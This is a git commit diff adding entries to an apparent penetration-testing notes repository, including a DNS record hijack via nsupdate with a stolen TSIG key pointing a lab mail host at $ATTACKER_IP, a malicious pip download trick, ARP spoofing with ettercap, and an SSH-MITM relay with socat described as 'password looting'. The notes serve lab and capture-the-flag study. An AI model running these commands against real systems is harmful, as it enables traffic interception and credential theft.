bump
This commit is contained in:
whackx
parent
840daf84da
commit
b0b36adea5
|
|
@ -23,3 +23,21 @@ send
|
|||
quit
|
||||
```
|
||||
* Check domain by querying the subdomain's A record via dig/drill/nslookup
|
||||
|
||||
### Found Secrets for Keys
|
||||
|
||||
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
|
||||
```sh
|
||||
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
|
||||
Creating key...
|
||||
namefromtext
|
||||
keycreate
|
||||
|
||||
server <domain>
|
||||
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
|
||||
send
|
||||
```
|
||||
|
||||
Copy the lines, every space counts as it has to be exactly like in the example
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
# Tips & Tricks for Binary Exploitations
|
||||
|
||||
# Toggle ASLR
|
||||
## Toggle ASLR
|
||||
|
||||
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
|
||||
|
||||
|
|
@ -39,3 +39,10 @@ echo -e '\xde\xad\xc0\xde' | xxd
|
|||
## NULL bytes in Adresses
|
||||
|
||||
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
|
||||
|
||||
## Read from running process
|
||||
|
||||
Read from a running process' stdout by attaching to the process via strace and read in the following way
|
||||
```sh
|
||||
strace -e read -p <ProcessId>
|
||||
```
|
||||
|
|
|
|||
|
|
@ -0,0 +1,12 @@
|
|||
# PIP Exploits
|
||||
|
||||
## pip download
|
||||
|
||||
Python pip executes tar files after the download option has been triggered.
|
||||
Therefore, a hand crafted python module needs to be created and build.
|
||||
After that pip can be used in the following way
|
||||
```sh
|
||||
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
|
||||
```
|
||||
|
||||
An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
|
||||
|
|
@ -1,3 +1,10 @@
|
|||
# SMTP
|
||||
|
||||
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
|
||||
|
||||
## Adhoc SMTP Server
|
||||
|
||||
Set up an SMTP Server quickly using `maildev`
|
||||
```sh
|
||||
sudo maildev -s 25 --ip $ATTACKER_IP
|
||||
```
|
||||
|
|
|
|||
|
|
@ -1,5 +1,8 @@
|
|||
# Man In the Middle
|
||||
|
||||
|
||||
## Ettercap
|
||||
|
||||
* [Ettercap](https://www.ettercap-project.org/)
|
||||
* [Bettercap](https://www.bettercap.org/)
|
||||
|
||||
|
|
@ -19,6 +22,7 @@ if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
|
|||
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
|
||||
}
|
||||
```
|
||||
|
||||
* Escape double quote inside the payload string
|
||||
* compile via
|
||||
```sh
|
||||
|
|
@ -29,3 +33,16 @@ etterfilter filter.ef -o filter.ef
|
|||
```sh
|
||||
ettercap -T -i <interface> -M arp -F filter.ef
|
||||
```
|
||||
|
||||
## mitm-server
|
||||
|
||||
Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
|
||||
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.
|
||||
|
||||
Redirect the port to the mitm server and start it afterwards
|
||||
|
||||
```sh
|
||||
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)
|
||||
|
||||
ssh-mitm server --remote-host $TARGET_IP
|
||||
```
|
||||
|
|
|
|||
Loading…
Reference in New Issue